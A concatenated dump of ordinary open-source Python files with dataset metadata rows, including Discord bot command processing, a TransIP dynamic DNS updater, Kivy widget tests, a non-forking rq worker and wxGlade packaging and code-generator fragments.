invoked_prefix = prefix
if prefix is None:
return ctx
elif isinstance(prefix, str):
if not view.skip_string(prefix):
return ctx
else:
try:
# if the context class' __init__ consumes something from the view this
# will be wrong. That seems unreasonable though.
if message.content.startswith(tuple(prefix)):
invoked_prefix = disnake.utils.find(view.skip_string, prefix)
else:
return ctx
except TypeError:
if not isinstance(prefix, list):
raise TypeError(
"get_prefix must return either a string or a list of string, "
f"not {prefix.__class__.__name__}"
)
# It's possible a bad command_prefix got us here.
for value in prefix:
if not isinstance(value, str):
raise TypeError(
"Iterable command_prefix or list returned from get_prefix must "
f"contain only strings, not {value.__class__.__name__}"
)
# Getting here shouldn't happen
raise
if self.strip_after_prefix:
view.skip_ws()
invoker = view.get_word()
ctx.invoked_with = invoker
# type-checker fails to narrow invoked_prefix type.
ctx.prefix = invoked_prefix # type: ignore
ctx.command = self.all_commands.get(invoker)
return ctx
async def invoke(self, ctx: Context) -> None:
"""|coro|
Invokes the command given under the invocation context and
handles all the internal event dispatch mechanisms.
Parameters
-----------
ctx: :class:`.Context`
The invocation context to invoke.
"""
if ctx.command is not None:
self.dispatch("command", ctx)
try:
if await self.can_run(ctx, call_once=True):
await ctx.command.invoke(ctx)
else:
raise errors.CheckFailure("The global check once functions failed.")
except errors.CommandError as exc:
await ctx.command.dispatch_error(ctx, exc)
else:
self.dispatch("command_completion", ctx)
elif ctx.invoked_with:
exc = errors.CommandNotFound(f'Command "{ctx.invoked_with}" is not found')
self.dispatch("command_error", ctx, exc)
async def process_commands(self, message: Message) -> None:
"""|coro|
This function processes the commands that have been registered
to the bot and other groups. Without this coroutine, none of the
commands will be triggered.
By default, this coroutine is called inside the :func:`.on_message`
event. If you choose to override the :func:`.on_message` event, then
you should invoke this coroutine as well.
This is built using other low level tools, and is equivalent to a
call to :meth:`~.Bot.get_context` followed by a call to :meth:`~.Bot.invoke`.
This also checks if the message's author is a bot and doesn't
call :meth:`~.Bot.get_context` or :meth:`~.Bot.invoke` if so.
Parameters
-----------
message: :class:`disnake.Message`
The message to process commands for.
"""
if message.author.bot:
return
ctx = await self.get_context(message)
await self.invoke(ctx)
async def on_message(self, message):
await self.process_commands(message)
| 33.375415 | 96 | 0.616016 |
from __future__ import annotations
import asyncio
import collections
import collections.abc
import inspect
import sys
import traceback
from typing import Any, Callable, List, TYPE_CHECKING, Optional, TypeVar, Type, Union
import disnake
from .core import GroupMixin
from .view import StringView
from .context import Context
from . import errors
from .help import HelpCommand, DefaultHelpCommand
from .common_bot_base import CommonBotBase
if TYPE_CHECKING:
from typing_extensions import ParamSpec
from disnake.message import Message
from disnake.interactions import ApplicationCommandInteraction
from ._types import (
Check,
CoroFunc,
)
ApplicationCommandInteractionT = TypeVar(
"ApplicationCommandInteractionT", bound=ApplicationCommandInteraction, covariant=True
)
AnyMessageCommandInter = Any
AnyUserCommandInter = Any
P = ParamSpec("P")
__all__ = (
"when_mentioned",
"when_mentioned_or",
"BotBase",
)
MISSING: Any = disnake.utils.MISSING
T = TypeVar("T")
CFT = TypeVar("CFT", bound="CoroFunc")
CXT = TypeVar("CXT", bound="Context")
def when_mentioned(bot: BotBase, msg: Message) -> List[str]:
return [f"<@{bot.user.id}> ", f"<@!{bot.user.id}> "]
def when_mentioned_or(*prefixes: str) -> Callable[[BotBase, Message], List[str]]:
def inner(bot, msg):
r = list(prefixes)
r = when_mentioned(bot, msg) + r
return r
return inner
def _is_submodule(parent: str, child: str) -> bool:
return parent == child or child.startswith(parent + ".")
class _DefaultRepr:
def __repr__(self):
return "<default-help-command>"
_default: Any = _DefaultRepr()
class BotBase(CommonBotBase, GroupMixin):
def __init__(
self,
command_prefix: Optional[Union[str, List[str], Callable]] = None,
help_command: HelpCommand = _default,
description: str = None,
**options: Any,
):
super().__init__(**options)
self.command_prefix = command_prefix
self._checks: List[Check] = []
self._check_once = []
self._before_invoke = None
self._after_invoke = None
self._help_command = None
self.description: str = inspect.cleandoc(description) if description else ""
self.strip_after_prefix: bool = options.get("strip_after_prefix", False)
if help_command is _default:
self.help_command = DefaultHelpCommand()
else:
self.help_command = help_command
async def on_command_error(self, context: Context, exception: errors.CommandError) -> None:
if self.extra_events.get("on_command_error", None):
return
command = context.command
if command and command.has_error_handler():
return
cog = context.cog
if cog and cog.has_error_handler():
return
print(f"Ignoring exception in command {context.command}:", file=sys.stderr)
traceback.print_exception(
type(exception), exception, exception.__traceback__, file=sys.stderr
)
def add_check(
self,
func: Check,
*,
call_once: bool = False,
) -> None:
if call_once:
self._check_once.append(func)
else:
self._checks.append(func)
def remove_check(
self,
func: Check,
*,
call_once: bool = False,
) -> None:
l = self._check_once if call_once else self._checks
try:
l.remove(func)
except ValueError:
pass
def check(self, func: T) -> T:
self.add_check(func)
return func
def check_once(self, func: CFT) -> CFT:
self.add_check(func, call_once=True)
return func
async def can_run(self, ctx: Context, *, call_once: bool = False) -> bool:
data = self._check_once if call_once else self._checks
if len(data) == 0:
return True
return await disnake.utils.async_all(f(ctx) for f in data) # type: ignore
def before_invoke(self, coro: CFT) -> CFT:
if not asyncio.iscoroutinefunction(coro):
raise TypeError("The pre-invoke hook must be a coroutine.")
self._before_invoke = coro
return coro
def after_invoke(self, coro: CFT) -> CFT:
if not asyncio.iscoroutinefunction(coro):
raise TypeError("The post-invoke hook must be a coroutine.")
self._after_invoke = coro
return coro
# extensions
def _remove_module_references(self, name: str) -> None:
super()._remove_module_references(name)
# remove all the commands from the module
for cmd in self.all_commands.copy().values():
if cmd.module is not None and _is_submodule(name, cmd.module):
if isinstance(cmd, GroupMixin):
cmd.recursively_remove_all_commands()
self.remove_command(cmd.name)
# help command stuff
@property
def help_command(self) -> Optional[HelpCommand]:
return self._help_command
@help_command.setter
def help_command(self, value: Optional[HelpCommand]) -> None:
if value is not None:
if not isinstance(value, HelpCommand):
raise TypeError("help_command must be a subclass of HelpCommand")
if self._help_command is not None:
self._help_command._remove_from_bot(self)
self._help_command = value
value._add_to_bot(self)
elif self._help_command is not None:
self._help_command._remove_from_bot(self)
self._help_command = None
else:
self._help_command = None
# command processing
async def get_prefix(self, message: Message) -> Optional[Union[List[str], str]]:
prefix = ret = self.command_prefix
if callable(prefix):
ret = await disnake.utils.maybe_coroutine(prefix, self, message)
if ret is None:
return None
if not isinstance(ret, str):
try:
ret = list(ret) # type: ignore
except TypeError:
# It's possible that a generator raised this exception. Don't
# replace it with our own error if that's the case.
if isinstance(ret, collections.abc.Iterable):
raise
raise TypeError(
"command_prefix must be plain string, iterable of strings, or callable "
f"returning either of these, not {ret.__class__.__name__}"
)
if not ret:
raise ValueError("Iterable command_prefix must contain at least one prefix")
return ret
async def get_context(self, message: Message, *, cls: Type[CXT] = Context) -> CXT:
view = StringView(message.content)
ctx = cls(prefix=None, view=view, bot=self, message=message)
if message.author.id == self.user.id:
return ctx
prefix = await self.get_prefix(message)
invoked_prefix = prefix
if prefix is None:
return ctx
elif isinstance(prefix, str):
if not view.skip_string(prefix):
return ctx
else:
try:
# will be wrong. That seems unreasonable though.
if message.content.startswith(tuple(prefix)):
invoked_prefix = disnake.utils.find(view.skip_string, prefix)
else:
return ctx
except TypeError:
if not isinstance(prefix, list):
raise TypeError(
"get_prefix must return either a string or a list of string, "
f"not {prefix.__class__.__name__}"
)
# It's possible a bad command_prefix got us here.
for value in prefix:
if not isinstance(value, str):
raise TypeError(
"Iterable command_prefix or list returned from get_prefix must "
f"contain only strings, not {value.__class__.__name__}"
)
raise
if self.strip_after_prefix:
view.skip_ws()
invoker = view.get_word()
ctx.invoked_with = invoker
# type-checker fails to narrow invoked_prefix type.
ctx.prefix = invoked_prefix # type: ignore
ctx.command = self.all_commands.get(invoker)
return ctx
async def invoke(self, ctx: Context) -> None:
if ctx.command is not None:
self.dispatch("command", ctx)
try:
if await self.can_run(ctx, call_once=True):
await ctx.command.invoke(ctx)
else:
raise errors.CheckFailure("The global check once functions failed.")
except errors.CommandError as exc:
await ctx.command.dispatch_error(ctx, exc)
else:
self.dispatch("command_completion", ctx)
elif ctx.invoked_with:
exc = errors.CommandNotFound(f'Command "{ctx.invoked_with}" is not found')
self.dispatch("command_error", ctx, exc)
async def process_commands(self, message: Message) -> None:
if message.author.bot:
return
ctx = await self.get_context(message)
await self.invoke(ctx)
async def on_message(self, message):
await self.process_commands(message)
| true | true |
f71024eea5e98c7df524c35442bced80a11680cf | 2,316 | py | Python | dyndns.py | jkeuper/transip_dyndns | 4a1d778b72f0a762f97bdaae16192b8216e99cea | [
"MIT"
] | null | null | null | dyndns.py | jkeuper/transip_dyndns | 4a1d778b72f0a762f97bdaae16192b8216e99cea | [
"MIT"
] | null | null | null | dyndns.py | jkeuper/transip_dyndns | 4a1d778b72f0a762f97bdaae16192b8216e99cea | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import sys
import argparse
from requests import get
from transip_rest_client import TransipRestClient
def getOptions(args=sys.argv[1:]):
parser = argparse.ArgumentParser(description="DynDNS: Updates a DNS record for a dynamic IP address.")
parser.add_argument("-u", "--user", help="Your username.", required=True)
parser.add_argument("-k", "--key", help="Key file containing RSA private key.", required=True)
parser.add_argument("-n", "--name", help="Name of the record (e.g. 'www').", required=True)
parser.add_argument("-d", "--domain", help="Existing DNS domain (e.g. 'example.com').", required=True)
parser.add_argument("-v", "--verbose", action='store_true', help="Verbose mode.")
options = parser.parse_args(args)
return options
def find(arr , id):
for x in arr:
if x["name"] == id:
return x
def main(key, username, domain, name, verbose):
with open(key, 'r') as f:
my_RSA_key = f.read()
if "BEGIN RSA PRIVATE KEY" not in my_RSA_key:
print("Key in incorrect format, convert the key with the following command:")
print("openssl rsa -in privatekey.txt -out rsaprivatekey.txt")
return
newIp = get('https://api.ipify.org').text
if verbose:
print(f"Retrieved IP from api.ipify.org: {newIp}")
client = TransipRestClient(user=username, rsaprivate_key=my_RSA_key, global_key=True)
entries = client.get_dns_entries(domain=domain)
if verbose:
print(f"Found {len(entries)} DNS entries")
entry = find(entries, name)
if entry is None:
print(f"No ip found, adding {newIp}")
client.post_dns_entry(domain=domain, name=name, expire=300, record_type='A', content=newIp)
else:
oldIp = entry["content"]
if verbose:
print(f"Found current IP in DNS entry: {oldIp}")
if oldIp != newIp:
print(f"Updating {oldIp} to {newIp}")
client.patch_dns_entry(domain=domain, name=name, record_type='A', content=newIp)
else:
print(f"Not updating {oldIp}")
if __name__ == "__main__":
options = getOptions()
if options.verbose:
print("Verbose output enabled.")
main(options.key, options.user, options.domain, options.name, options.verbose)
| 35.630769 | 106 | 0.648964 |
import sys
import argparse
from requests import get
from transip_rest_client import TransipRestClient
def getOptions(args=sys.argv[1:]):
parser = argparse.ArgumentParser(description="DynDNS: Updates a DNS record for a dynamic IP address.")
parser.add_argument("-u", "--user", help="Your username.", required=True)
parser.add_argument("-k", "--key", help="Key file containing RSA private key.", required=True)
parser.add_argument("-n", "--name", help="Name of the record (e.g. 'www').", required=True)
parser.add_argument("-d", "--domain", help="Existing DNS domain (e.g. 'example.com').", required=True)
parser.add_argument("-v", "--verbose", action='store_true', help="Verbose mode.")
options = parser.parse_args(args)
return options
def find(arr , id):
for x in arr:
if x["name"] == id:
return x
def main(key, username, domain, name, verbose):
with open(key, 'r') as f:
my_RSA_key = f.read()
if "BEGIN RSA PRIVATE KEY" not in my_RSA_key:
print("Key in incorrect format, convert the key with the following command:")
print("openssl rsa -in privatekey.txt -out rsaprivatekey.txt")
return
newIp = get('https://api.ipify.org').text
if verbose:
print(f"Retrieved IP from api.ipify.org: {newIp}")
client = TransipRestClient(user=username, rsaprivate_key=my_RSA_key, global_key=True)
entries = client.get_dns_entries(domain=domain)
if verbose:
print(f"Found {len(entries)} DNS entries")
entry = find(entries, name)
if entry is None:
print(f"No ip found, adding {newIp}")
client.post_dns_entry(domain=domain, name=name, expire=300, record_type='A', content=newIp)
else:
oldIp = entry["content"]
if verbose:
print(f"Found current IP in DNS entry: {oldIp}")
if oldIp != newIp:
print(f"Updating {oldIp} to {newIp}")
client.patch_dns_entry(domain=domain, name=name, record_type='A', content=newIp)
else:
print(f"Not updating {oldIp}")
if __name__ == "__main__":
options = getOptions()
if options.verbose:
print("Verbose output enabled.")
main(options.key, options.user, options.domain, options.name, options.verbose)
| true | true |
f7102601e30fef5f8d8eff91e5adb145e938c0cf | 4,105 | py | Python | kivy/tests/test_widget.py | yunus-ceyhan/kivy | ba646bd82c8eb5c505c68d18de52f8f3e6cf199a | [
"MIT"
] | 1 | 2022-02-06T11:20:43.000Z | 2022-02-06T11:20:43.000Z | kivy/tests/test_widget.py | yunus-ceyhan/kivy | ba646bd82c8eb5c505c68d18de52f8f3e6cf199a | [
"MIT"
] | null | null | null | kivy/tests/test_widget.py | yunus-ceyhan/kivy | ba646bd82c8eb5c505c68d18de52f8f3e6cf199a | [
"MIT"
] | 1 | 2022-01-19T09:10:47.000Z | 2022-01-19T09:10:47.000Z | import unittest
from tempfile import mkdtemp
from shutil import rmtree
class WidgetTestCase(unittest.TestCase):
def setUp(self):
from kivy.uix.widget import Widget
self.cls = Widget
self.root = Widget()
def test_add_remove_widget(self):
root = self.root
self.assertEqual(root.children, [])
c1 = self.cls()
root.add_widget(c1)
self.assertEqual(root.children, [c1])
root.remove_widget(c1)
self.assertEqual(root.children, [])
def test_invalid_add_widget(self):
from kivy.uix.widget import WidgetException
try:
# None of them should work
self.root.add_widget(None)
self.root.add_widget(WidgetException)
self.root.add_widget(self.cls)
self.fail()
except WidgetException:
pass
def test_clear_widgets(self):
root = self.root
self.assertEqual(root.children, [])
c1 = self.cls()
c2 = self.cls()
c3 = self.cls()
root.add_widget(c1, index=0)
root.add_widget(c2, index=1)
root.add_widget(c3, index=2)
self.assertEqual(root.children, [c1, c2, c3])
root.clear_widgets([c2])
self.assertEqual(root.children, [c1, c3])
root.clear_widgets([])
self.assertEqual(root.children, [c1, c3])
root.clear_widgets()
self.assertEqual(root.children, [])
def test_clear_widgets_children(self):
root = self.root
for _ in range(10):
root.add_widget(self.cls())
self.assertEqual(len(root.children), 10)
root.clear_widgets(root.children)
self.assertEqual(root.children, [])
def test_position(self):
wid = self.root
wid.x = 50
self.assertEqual(wid.x, 50)
self.assertEqual(wid.pos, [50, 0])
wid.y = 60
self.assertEqual(wid.y, 60)
self.assertEqual(wid.pos, [50, 60])
wid.pos = (0, 0)
self.assertEqual(wid.pos, [0, 0])
self.assertEqual(wid.x, 0)
self.assertEqual(wid.y, 0)
def test_size(self):
wid = self.root
wid.width = 50
self.assertEqual(wid.width, 50)
self.assertEqual(wid.size, [50, 100])
wid.height = 60
self.assertEqual(wid.height, 60)
self.assertEqual(wid.size, [50, 60])
wid.size = (100, 100)
self.assertEqual(wid.size, [100, 100])
self.assertEqual(wid.width, 100)
self.assertEqual(wid.height, 100)
def test_collision(self):
wid = self.root
self.assertEqual(wid.pos, [0, 0])
self.assertEqual(wid.size, [100, 100])
self.assertEqual(wid.collide_point(-1, -1), False)
self.assertEqual(wid.collide_point(0, 0), True)
self.assertEqual(wid.collide_point(50, 50), True)
self.assertEqual(wid.collide_point(100, 100), True)
self.assertEqual(wid.collide_point(200, 0), False)
self.assertEqual(wid.collide_point(500, 500), False)
# Currently rejected with a Shader didn't link, but work alone.
@unittest.skip("Doesn't work with testsuite, but work alone")
def test_export_to_png(self):
from kivy.core.image import Image as CoreImage
from kivy.uix.button import Button
from os.path import join
wid = Button(text='test', size=(200, 100), size_hint=(None, None))
self.root.add_widget(wid)
tmp = mkdtemp()
wid.export_to_png(join(tmp, 'a.png'))
wid.export_to_png(join(tmp, 'b.png'), scale=.5)
wid.export_to_png(join(tmp, 'c.png'), scale=2)
self.assertEqual(CoreImage(join(tmp, 'a.png')).size, (200, 100))
self.assertEqual(CoreImage(join(tmp, 'b.png')).size, (100, 50))
self.assertEqual(CoreImage(join(tmp, 'c.png')).size, (400, 200))
rmtree(tmp)
self.root.remove_widget(wid)
def test_disabled(self):
from kivy.uix.widget import Widget
w = Widget(disabled=None)
w.disabled = False
w.disabled = True
self.assertEqual(w.disabled, True)
| 32.070313 | 74 | 0.60268 | import unittest
from tempfile import mkdtemp
from shutil import rmtree
class WidgetTestCase(unittest.TestCase):
    """Tests for the basic kivy ``Widget`` API: child management, geometry
    properties, collision detection, PNG export and ``disabled``."""
    def setUp(self):
        # Import lazily so kivy is only required when the tests actually run.
        from kivy.uix.widget import Widget
        self.cls = Widget
        self.root = Widget()
    def test_add_remove_widget(self):
        # Adding then removing a child must leave ``children`` empty again.
        root = self.root
        self.assertEqual(root.children, [])
        c1 = self.cls()
        root.add_widget(c1)
        self.assertEqual(root.children, [c1])
        root.remove_widget(c1)
        self.assertEqual(root.children, [])
    def test_invalid_add_widget(self):
        # add_widget() must reject non-widget arguments (None, bare classes)
        # by raising WidgetException.
        from kivy.uix.widget import WidgetException
        try:
            self.root.add_widget(None)
            self.root.add_widget(WidgetException)
            self.root.add_widget(self.cls)
            self.fail()
        except WidgetException:
            pass
    def test_clear_widgets(self):
        # clear_widgets() with an explicit list removes only those children;
        # with an empty list it is a no-op; with no argument it removes all.
        root = self.root
        self.assertEqual(root.children, [])
        c1 = self.cls()
        c2 = self.cls()
        c3 = self.cls()
        root.add_widget(c1, index=0)
        root.add_widget(c2, index=1)
        root.add_widget(c3, index=2)
        self.assertEqual(root.children, [c1, c2, c3])
        root.clear_widgets([c2])
        self.assertEqual(root.children, [c1, c3])
        root.clear_widgets([])
        self.assertEqual(root.children, [c1, c3])
        root.clear_widgets()
        self.assertEqual(root.children, [])
    def test_clear_widgets_children(self):
        # Passing root.children itself must still remove every child (the
        # implementation has to cope with mutating the list being iterated).
        root = self.root
        for _ in range(10):
            root.add_widget(self.cls())
        self.assertEqual(len(root.children), 10)
        root.clear_widgets(root.children)
        self.assertEqual(root.children, [])
    def test_position(self):
        # x/y and the composite ``pos`` property must stay in sync.
        wid = self.root
        wid.x = 50
        self.assertEqual(wid.x, 50)
        self.assertEqual(wid.pos, [50, 0])
        wid.y = 60
        self.assertEqual(wid.y, 60)
        self.assertEqual(wid.pos, [50, 60])
        wid.pos = (0, 0)
        self.assertEqual(wid.pos, [0, 0])
        self.assertEqual(wid.x, 0)
        self.assertEqual(wid.y, 0)
    def test_size(self):
        # width/height and the composite ``size`` property must stay in sync.
        wid = self.root
        wid.width = 50
        self.assertEqual(wid.width, 50)
        self.assertEqual(wid.size, [50, 100])
        wid.height = 60
        self.assertEqual(wid.height, 60)
        self.assertEqual(wid.size, [50, 60])
        wid.size = (100, 100)
        self.assertEqual(wid.size, [100, 100])
        self.assertEqual(wid.width, 100)
        self.assertEqual(wid.height, 100)
    def test_collision(self):
        # collide_point() is inclusive at the widget's borders: both (0, 0)
        # and (100, 100) collide for a 100x100 widget at the origin.
        wid = self.root
        self.assertEqual(wid.pos, [0, 0])
        self.assertEqual(wid.size, [100, 100])
        self.assertEqual(wid.collide_point(-1, -1), False)
        self.assertEqual(wid.collide_point(0, 0), True)
        self.assertEqual(wid.collide_point(50, 50), True)
        self.assertEqual(wid.collide_point(100, 100), True)
        self.assertEqual(wid.collide_point(200, 0), False)
        self.assertEqual(wid.collide_point(500, 500), False)
    @unittest.skip("Doesn't work with testsuite, but work alone")
    def test_export_to_png(self):
        # export_to_png() must honour the ``scale`` argument; output goes to
        # a temporary directory which is removed again afterwards.
        from kivy.core.image import Image as CoreImage
        from kivy.uix.button import Button
        from os.path import join
        wid = Button(text='test', size=(200, 100), size_hint=(None, None))
        self.root.add_widget(wid)
        tmp = mkdtemp()
        wid.export_to_png(join(tmp, 'a.png'))
        wid.export_to_png(join(tmp, 'b.png'), scale=.5)
        wid.export_to_png(join(tmp, 'c.png'), scale=2)
        self.assertEqual(CoreImage(join(tmp, 'a.png')).size, (200, 100))
        self.assertEqual(CoreImage(join(tmp, 'b.png')).size, (100, 50))
        self.assertEqual(CoreImage(join(tmp, 'c.png')).size, (400, 200))
        rmtree(tmp)
        self.root.remove_widget(wid)
    def test_disabled(self):
        # ``disabled`` accepts None at construction and plain bool assignment.
        from kivy.uix.widget import Widget
        w = Widget(disabled=None)
        w.disabled = False
        w.disabled = True
        self.assertEqual(w.disabled, True)
| true | true |
f71026672a7680d364cfb68c1f7b6f4ab8b30417 | 3,152 | py | Python | trader/batch/non_fork_worker.py | 9600dev/mmr | b08e63b7044f2b2061d8679b216822c82d309c86 | [
"Apache-2.0"
] | 12 | 2021-09-22T21:19:23.000Z | 2022-01-03T21:38:47.000Z | trader/batch/non_fork_worker.py | 9600dev/mmr | b08e63b7044f2b2061d8679b216822c82d309c86 | [
"Apache-2.0"
] | null | null | null | trader/batch/non_fork_worker.py | 9600dev/mmr | b08e63b7044f2b2061d8679b216822c82d309c86 | [
"Apache-2.0"
] | 3 | 2021-09-05T23:26:13.000Z | 2022-03-25T01:01:22.000Z | import time
import sys
import random
import datetime
import rq
import rq.job
import rq.compat
import rq.worker
from rq.defaults import (DEFAULT_LOGGING_FORMAT, DEFAULT_LOGGING_DATE_FORMAT)
class NonForkWorker(rq.Worker):
    """An rq Worker that executes jobs inline in the current process instead
    of fork()ing a separate work-horse process.

    NOTE(review): as a consequence the job's time limit is NOT enforced (see
    perform_job below) and a crashing job can take the whole worker down.
    """
    def __init__(self, *args, **kwargs):
        # Use a short worker TTL unless the caller passed an explicit one.
        if kwargs.get('default_worker_ttl', None) is None:
            kwargs['default_worker_ttl'] = 2
        super(NonForkWorker, self).__init__(*args, **kwargs)
    def work(self, burst=False, logging_level="INFO", date_format=DEFAULT_LOGGING_DATE_FORMAT,
             log_format=DEFAULT_LOGGING_FORMAT, max_jobs=None, with_scheduler=False):
        """Start the work loop; forces the short worker TTL again before
        delegating to rq.Worker.work() with unchanged arguments."""
        self.default_worker_ttl = 2
        return super(NonForkWorker, self).work(
            burst=burst,
            logging_level=logging_level,
            date_format=date_format,
            log_format=log_format,
            max_jobs=max_jobs,
            with_scheduler=with_scheduler
        )
    def execute_job(self, job, queue):
        # Run the job directly -- no os.fork() as in rq.Worker.execute_job.
        self.main_work_horse(job, queue)
    def main_work_horse(self, job, queue):
        # Mimic the work-horse bookkeeping of the forking worker, but inline.
        # NOTE(review): ``success`` is never used -- consider returning it.
        random.seed()
        self._is_horse = True
        success = self.perform_job(job, queue)
        self._is_horse = False
    def perform_job(self, job, queue, heartbeat_ttl=None):
        """Execute *job* inline and persist its outcome to Redis.

        Returns True on success, False if the job raised.  ``heartbeat_ttl``
        is accepted only for signature compatibility with rq.Worker and is
        ignored here.
        """
        self.prepare_job_execution(job)
        self.procline('Processing %s from %s since %s' % (
            job.func_name,
            job.origin, time.time()))
        try:
            job.started_at = datetime.datetime.now()
            # I have DISABLED the time limit!
            rv = job.perform()
            # Pickle the result in the same try-except block since we need to
            # use the same exc handling when pickling fails
            job._result = rv
            job._status = rq.job.JobStatus.FINISHED
            job.ended_at = datetime.datetime.now()
            # All bookkeeping goes through a single Redis pipeline so that
            # dependents, counters and the result are committed together.
            with self.connection.pipeline() as pipeline:
                pipeline.watch(job.dependents_key)
                queue.enqueue_dependents(job, pipeline=pipeline)
                self.set_current_job_id(None, pipeline=pipeline)
                self.increment_successful_job_count(pipeline=pipeline)
                result_ttl = job.get_result_ttl(self.default_result_ttl)
                if result_ttl != 0:
                    job.save(pipeline=pipeline, include_meta=False)
                job.cleanup(result_ttl, pipeline=pipeline,
                            remove_from_queue=False)
                pipeline.execute()
        except:
            # Use the public setter here, to immediately update Redis
            job.status = rq.job.JobStatus.FAILED
            self.handle_exception(job, *sys.exc_info())
            return False
        if rv is None:
            self.log.info('Job OK')
        else:
            self.log.info('Job OK, result = %s' % (rq.worker.yellow(rq.compat.text_type(rv)),))
        if result_ttl == 0:
            self.log.info('Result discarded immediately.')
        elif result_ttl > 0:
            self.log.info('Result is kept for %d seconds.' % result_ttl)
        else:
            self.log.warning('Result will never expire, clean up result key manually.')
        return True
import sys
import random
import datetime
import rq
import rq.job
import rq.compat
import rq.worker
from rq.defaults import (DEFAULT_LOGGING_FORMAT, DEFAULT_LOGGING_DATE_FORMAT)
class NonForkWorker(rq.Worker):
def __init__(self, *args, **kwargs):
if kwargs.get('default_worker_ttl', None) is None:
kwargs['default_worker_ttl'] = 2
super(NonForkWorker, self).__init__(*args, **kwargs)
def work(self, burst=False, logging_level="INFO", date_format=DEFAULT_LOGGING_DATE_FORMAT,
log_format=DEFAULT_LOGGING_FORMAT, max_jobs=None, with_scheduler=False):
self.default_worker_ttl = 2
return super(NonForkWorker, self).work(
burst=burst,
logging_level=logging_level,
date_format=date_format,
log_format=log_format,
max_jobs=max_jobs,
with_scheduler=with_scheduler
)
def execute_job(self, job, queue):
self.main_work_horse(job, queue)
def main_work_horse(self, job, queue):
random.seed()
self._is_horse = True
success = self.perform_job(job, queue)
self._is_horse = False
def perform_job(self, job, queue, heartbeat_ttl=None):
self.prepare_job_execution(job)
self.procline('Processing %s from %s since %s' % (
job.func_name,
job.origin, time.time()))
try:
job.started_at = datetime.datetime.now()
rv = job.perform()
job._result = rv
job._status = rq.job.JobStatus.FINISHED
job.ended_at = datetime.datetime.now()
with self.connection.pipeline() as pipeline:
pipeline.watch(job.dependents_key)
queue.enqueue_dependents(job, pipeline=pipeline)
self.set_current_job_id(None, pipeline=pipeline)
self.increment_successful_job_count(pipeline=pipeline)
result_ttl = job.get_result_ttl(self.default_result_ttl)
if result_ttl != 0:
job.save(pipeline=pipeline, include_meta=False)
job.cleanup(result_ttl, pipeline=pipeline,
remove_from_queue=False)
pipeline.execute()
except:
job.status = rq.job.JobStatus.FAILED
self.handle_exception(job, *sys.exc_info())
return False
if rv is None:
self.log.info('Job OK')
else:
self.log.info('Job OK, result = %s' % (rq.worker.yellow(rq.compat.text_type(rv)),))
if result_ttl == 0:
self.log.info('Result discarded immediately.')
elif result_ttl > 0:
self.log.info('Result is kept for %d seconds.' % result_ttl)
else:
self.log.warning('Result will never expire, clean up result key manually.')
return True | true | true |
f710267bb6eaca71d34daef2c77ac942970d7e2a | 2,601 | py | Python | setup.py | groupserver/gs.site.change.name | fdf9a6d2ea2b49c98f5fe0f88ba1de06c57ff052 | [
"ZPL-2.1"
] | null | null | null | setup.py | groupserver/gs.site.change.name | fdf9a6d2ea2b49c98f5fe0f88ba1de06c57ff052 | [
"ZPL-2.1"
] | null | null | null | setup.py | groupserver/gs.site.change.name | fdf9a6d2ea2b49c98f5fe0f88ba1de06c57ff052 | [
"ZPL-2.1"
] | null | null | null | # -*- coding: utf-8 -*-
############################################################################
#
# Copyright © 2011, 2012, 2013, 2014, 2015 OnlineGroups.net and
# Contributors.
#
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
############################################################################
import codecs
import os
from setuptools import setup, find_packages
from version import get_version
version = get_version()

# Build the long description from the README plus the change history.
with codecs.open('README.rst', encoding='utf-8') as f:
    long_description = f.read()
with codecs.open(os.path.join("docs", "HISTORY.rst"),
                 encoding='utf-8') as f:
    long_description += '\n' + f.read()

setup(
    name='gs.site.change.name',
    version=version,
    description="Change the name of a GroupServer site",
    long_description=long_description,
    classifiers=[
        'Development Status :: 5 - Production/Stable',
        "Environment :: Web Environment",
        "Framework :: Zope2",
        "Intended Audience :: Developers",
        'License :: OSI Approved :: Zope Public License',
        "Natural Language :: English",
        "Natural Language :: French",
        "Natural Language :: German",
        "Operating System :: POSIX :: Linux",
        "Programming Language :: Python",
        "Topic :: Software Development :: Libraries :: Python Modules",
    ],
    # BUGFIX: was 'site ,groupserver, ...' -- misplaced comma/space produced
    # a malformed first keyword in the package metadata.
    keywords='site, groupserver, name, configure, admin',
    author='Michael JasonSmith',
    author_email='mpj17@onlinegroups.net',
    url='https://source.iopen.net/groupserver/gs.site.change.name/',
    license='ZPL 2.1',
    packages=find_packages(exclude=['ez_setup']),
    namespace_packages=['gs', 'gs.site', 'gs.site.change', ],
    include_package_data=True,
    zip_safe=False,
    install_requires=[
        'setuptools',
        'zope.formlib',
        'zope.browserpage',
        'zope.i18n[compile]',
        'zope.i18nmessageid',
        'zope.interface',
        'zope.schema',
        'zope.tal',
        'zope.tales',
        'zope.viewlet',
        'Zope2',
        'gs.content.form.base',
        'gs.content.layout',
        'gs.help',
        'gs.site.change.base',
        'Products.GSContent',
    ],
    entry_points="""
    # -*- Entry points: -*-
    """,)
| 33.346154 | 76 | 0.595925 | true | true | |
f71028c1481c1fcee06411fa05f09fe527e33b31 | 50,356 | py | Python | codegen/cpp_codegen.py | ardovm/wxGlade | a4cf8e65bcc6df5f65cf8ca5c49b9a628bf1e8eb | [
"MIT"
] | null | null | null | codegen/cpp_codegen.py | ardovm/wxGlade | a4cf8e65bcc6df5f65cf8ca5c49b9a628bf1e8eb | [
"MIT"
] | null | null | null | codegen/cpp_codegen.py | ardovm/wxGlade | a4cf8e65bcc6df5f65cf8ca5c49b9a628bf1e8eb | [
"MIT"
] | null | null | null | """\
C++ code generator
@copyright: 2002-2007 Alberto Griggio
@copyright: 2012-2016 Carsten Grohmann
@copyright: 2017-2020 Dietmar Schwertberger
@license: MIT (see LICENSE.txt) - THIS PROGRAM COMES WITH NO WARRANTY
"""
import os.path, re, logging
from codegen import BaseLangCodeWriter, BaseSourceFileContent, _replace_tag
from codegen import ClassLines as BaseClassLines
import config, wcodegen
class SourceFileContent(BaseSourceFileContent):
    """Keeps info about an existing file that has to be updated, to replace only the lines inside a wxGlade block,
    and to keep the rest of the file as it was.

